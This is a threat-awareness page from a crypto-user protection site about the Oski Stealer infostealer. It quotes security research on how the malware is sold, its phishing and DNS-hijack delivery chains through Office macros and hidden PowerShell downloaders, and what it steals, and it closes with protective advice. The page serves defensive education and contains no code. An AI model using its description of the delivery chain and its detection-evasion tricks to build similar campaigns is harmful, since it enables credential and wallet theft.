"First observed around November 2019, Oski Stealer is a popular threat, used to gather credentials and/or financial data from victims, and is readily available to purchase on various cybercriminal forums, typically advertised by a threat actor known as ‘oski_seller’, for around US$70-100 (Figure 1)." "As the name implies, the Oski stealer steals personal and sensitive information from its target. “Oski” is derived from an old Nordic word meaning Viking warrior, which is quite fitting considering this popular info-stealer is extremely effective at pillaging privileged information from its victims."


"Attackers try to trick users into installing Oski by hijacking router DNS settings in order that browsers then open corrupted pages and pop-ups. This motivates visitors to put in an application designed to deliver the latest information referring to the COVID-19. In fact, the file that’s downloaded through these malicious sites installs Oski, a trojan horse capable of stealing sensitive information." "[W]hen the settings are configured to use DNS servers operated by the attackers/cyber criminals. The servers redirect victims to an address displaying a web page encouraging them to download and install Oski, which is disguised as a legitimate app from the World Health Organization (WHO)."


"Given the nature of the email lure, recipients targeted will likely include those working within Business Administration, Finance and Sales teams. Furthermore, the compromise of one organization could lead to legitimate email accounts being abused to send convincing lures to other organizations, such as their customers, partners and suppliers." "Having lured the victim into opening the malicious email attachment, a weaponized Microsoft PowerPoint (PPT) file in this case, albeit easily interchangeable for some other Microsoft Office file, the victim is prompted to ‘Enable Editing’ and ‘Enable Content’ resulting in an embedded macro (Figure 4) being executed to download and initiate the first stage Powershell script. Whilst lightly obfuscated, this macro creates a Windows Scripting Host Shell Execution object, wshshell.exec, that executes the Microsoft HTML Application process, mshta, to send a HTTP GET request to a ‘Bit.ly’ shortened URL."


"Having redirected to a Blogspot-hosted page, the resulting HTML file (Figure 6) contains a Visual Basic script that is used to ultimately download and launch Agent Tesla that, in turn, downloads and launches Oski Stealer." "Using basic obfuscation, the Visual Basic Script downloader launches a hidden PowerShell window (-w 1), calling the Invoke-Expression (i'E'x) and Invoke-WebRequest (iwr) cmdlets to download and execute a PowerShell script named divine.txt from ‘Archive.org’. The hosting of content on this legitimate service is likely an attempt to avoid detection whilst allowing the delivery method to be updated mid-campaign without the needing to manage infrastructure such as domains and/or VPS instances."


"Cyberint Research observed a number of unsolicited malicious email (malspam) campaigns throughout July 2021 in which Agent Tesla has been used to deliver ‘Oski Stealer’ to a variety of targets worldwide." "In addition to being actively sold and supported by the original creator, unverified forum posts suggest that a ‘cracked’ version of Oski Stealer was leaked toward the end of 2020 (Figure 2) that, if true, could potentially lead to broader adoption."


"The stealer is written in C++ and has all the typical features of credential theft malware. Oski targets sensitive information including login credentials from different applications, browser information (cookies, autofill data and credit cards), crypto wallets, system information, screenshots, [and] different user files." "It also attempts to steal databases that contain 2FA (two-factor authentication) data, cryptocurrency wallets, and text files, and can take screenshots of the victim's desktop and perform other dubious actions. In this way, cyber criminals behind Oski are able to hijack various accounts, including social media, email, cryptocurrency trading accounts, and so on."


"After infecting a machine, the malware attempts retrieving sensitive information from web browsers based on Chromium and Firefox along with a special focus on Filezilla and crypto wallets like Bitcoin Core, Ethereum, ElectrumLTC, Monero, Electrum, Dash, Litecoin, ZCash." "Bitcoin Core, Ethereum, ElectrumLTC, Monero, Electrum, Exodus, Dash, Litecoin, ElectronCash, ZCash, MultiDoge, AnonCoin, BBQCoin, DevCoin, DigitalCoin, FlorinCoin, Franko, FreiCoin, GoldCoin, InfiniteCoin, IOCoin, IxCoin, MegaCoin, MinCoin, NameCoin, PrimeCoin, TerraCoin, YACoinFiles from machine data about machine."


"Upon the completion of the data theft stage, Oski Stealer creates a compressed Zip archive containing all of this stolen data, and names this with an underscore followed by the first ten digits of the working directory name."


"Beyond these, the stealer can function as a Downloader to download a second-stage malware." Attackers "might [also] be capable of hijacking accounts that have an additional layer of protection beyond passwords. Cyber criminals misuse stolen accounts to make fraudulent purchases and transactions, spread spam campaigns, trick other users into paying money to them, steal identities, etc."

The Oski Stealer is a malware which steals private information of the user, including crypto wallet details. It typically spreads by created targeted phishing attacks to trick the recipient into downloading an infected Microsoft Office file (such as PowerPoint). Once the file is downloaded, that installs malware which obtains data and can also launch other "command and control" functions. While the software does target many cryptocurrency wallets, it's unclear how successful the attacks have been as it tends to target unsophisticated business workers and not crypto users who would typically use such wallets.


The basic protection is to not download any attachments from untrusted sources, and especially do not enable macros in a downloaded Microsoft Office file. Be extra careful if the file is of an unexpected type (for example a PowerPoint file when it's a purchase order). In general, all downloads should only be done from a trusted source. The vast majority of cryptocurrency should be stored fully offline when not being actively used.


Check Our Framework For Safe Secure Exchange Platforms

Sources And Further Reading

 For questions or enquiries, email info@quadrigainitiative.com.

Get Social

  • email
  • reddit
  • telegram
  • Twitter

© 2021 Quadriga Initiative. Your use of this site/service accepts the Terms of Use and Privacy Policy. This site is not associated with Ernst & Young, Miller Thompson, or the Official Committee of Affected Users. Hosted in Canada by HosterBox.